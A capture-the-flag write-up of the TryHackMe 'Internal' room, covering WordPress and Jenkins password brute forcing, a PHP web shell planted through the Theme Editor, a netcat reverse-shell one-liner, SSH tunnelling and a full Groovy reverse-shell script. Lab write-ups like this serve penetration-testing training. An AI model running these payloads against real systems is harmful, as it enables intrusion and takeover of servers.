TryHackMe - Internal

Internal is a room on TryHackMe where you get to perform a mock penetration test. The room’s introduction provides the scope of the engagement:

Scope of Work

The client requests that an engineer conducts an external, web app, and internal assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test). The client has asked that you secure two flags (no location provided) as proof of exploitation:

  • User.txt
  • Root.txt

Additionally, the client has provided the following scope allowances:

  • Ensure that you modify your hosts file to reflect internal.thm
  • Any tools or techniques are permitted in this engagement
  • Locate and note all vulnerabilities found
  • Submit the flags discovered to the dashboard
  • Only the IP address assigned to your machine is in scope

https://tryhackme.com/room/internal

Credit to Joe Helle for creating this room - https://twitter.com/joehelle

ENUMERATION

I’ll start with a rustscan to see what ports are open. You can find rustscan here.

I’m also going to add the ip address to my /etc/hosts file:

10.10.110.112 internal.thm

The scan comes back with two ports open:

kali@kali:$ rustscan --ulimit 5000 internal.thm

--- snip ---

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Navigating to http://internal.thm returns a default apache page.

Now I’ll run gobuster to see if I can find any interesting directories on the webserver:

kali@kali:$ gobuster dir --url http://internal.thm/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://internal.thm/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/07 18:29:46 Starting gobuster
===============================================================
/blog (Status: 301)
/wordpress (Status: 301)
/javascript (Status: 301)
/phpmyadmin (Status: 301)

It look like there’s a Wordpress blog running on the box. Navigating to /blog returns the front page for the blog:

And I can get to the default wordpress login at http://internal.thm/blog/wp-login.php:

My go-to tool for enumerating Wordpress sites is wpscan. I’ll run wpscan to see if I can find any users on the site and brute force their password.

kali@kali:$ wpscan --enumerate u --passwords /usr/share/wordlists/rockyou.txt --url http://internal.thm/wordpress/

--- snip ---

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://internal.thm/blog/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Login Error Messages (Aggressive Detection)

--- snip --- 

[+] Performing password attack on Xmlrpc against 1 user/s
Trying admin / my2boys Time: 00:06:03 <=================================================================================================================================================================> (3885 / 3885) 100.00% Time: 00:06:03

[SUCCESS] - admin / --redacted--                                                                                                                                                                                                                   

[!] Valid Combinations Found:
 | Username: admin, Password: --redacted--

EXPLOITATION

The scan returns the admin user and their password! I’ll use these creds to login to the admin panel. From here, I can use the “Theme Editor” to create a php backdoor by replacing the code for the 404.php page.

I’ll use the following code for the backdoor:

<?php system($_REQUEST['pwned']); ?>

I’ll visit http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php?pwned=id to confirm that I have code execution.

I can now use the following curl command to get a reverse shell on the box with netcat:

curl "http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php" --data-urlencode "pwned=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.2.4.244 53 >/tmp/f

And I can catch the shell with netcat on my kali box.

PRIVILEGE ESCALATION

I now have a shell as www-data and need to escalate my privileges to root. I can see that there is a user “aubreanna” on the box, but I don’t have access to her home directory.

$ ls -la /home        
total 12
drwxr-xr-x  3 root      root      4096 Aug  3 01:40 .
drwxr-xr-x 24 root      root      4096 Aug  3 01:31 ..
drwx------  7 aubreanna aubreanna 4096 Aug  3 03:57 aubreanna

However, I do find an interesting file named wp-save.txt in the /opt directory that gives me a hint on where to look next:

$ cat /opt/wp-save.txt

Bill,

Aubreanna needed these credentials for something later.  Let her know you have them and where they are.

aubreanna: --redacted--

I can use these credentials to ssh in as user Aubreanna:

root@ip-10-10-111-47:~# ssh aubreanna@internal.thm

aubreanna@internal.thm's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)

aubreanna@internal:~$ ls -l
total 12
-rwx------ 1 aubreanna aubreanna   55 Aug  3 03:57 jenkins.txt
drwx------ 3 aubreanna aubreanna 4096 Aug  3 01:41 snap
-rwx------ 1 aubreanna aubreanna   21 Aug  3 03:56 user.txt

From here I can read the user flag and get my next hint from the jenkins.txt file:

aubreanna@internal:~$ cat jenkins.txt 
Internal Jenkins service is running on 172.17.0.2:8080

I can’t get to the Jenkins server from my kali box, but I can reach it from the internal.thm host. Since I have ssh access the the internal.thm box, I can create an ssh tunnel to get to the Jenkins server:

ssh -L 8080:172.17.0.2:8080 aubreanna@internal.thm

Once again, I’ll have to brute force for the admin password. I guessed the username of ‘admin’ and used rockyou.txt for my password wordlist. I’ll perform the bruteforce attack with BurpSuite. I can intercept the login request and send it to intruder. Within intruder, I can mark the password field as the target, load the wordlist, and begin the attack:

Intercepting the request:

Marking the password field:

Loading the wordlist and beginning the attack:

I can sort by HTTP response length to find the successful login request and corresponding password:

I’m not too familiar with Jenkins, but I did some googling and found that there is a script console that allows admins to execute commands on the server.

All scripts must be written in Groovy script.

I was able to find this Groovy script reverse shell on Github and get a reverse shell on my Kali box. I’ll modify the host, port, and cmd variables to match my target:

String host="10.10.111.47";
int port=4444;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
kali@kali:$ nc -lvnp 4444

whoami
jenkins

id
uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins)

I’ll once again enumerate the /opt directory to find another clue:

cd /opt

ls
note.txt

cat note.txt

Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here.  Use them if you 
need access to the root user account.

root:--redacted--

And now I can ssh as root and grab the root flag :)

CONCLUSION

Internal was a pretty easy room, but fun nonetheless. I enjoyed getting to learn more about Jenkins and sniping admin passwords.

Feel free to reach out to me on Twitter if you have any questions.

Written on September 30, 2020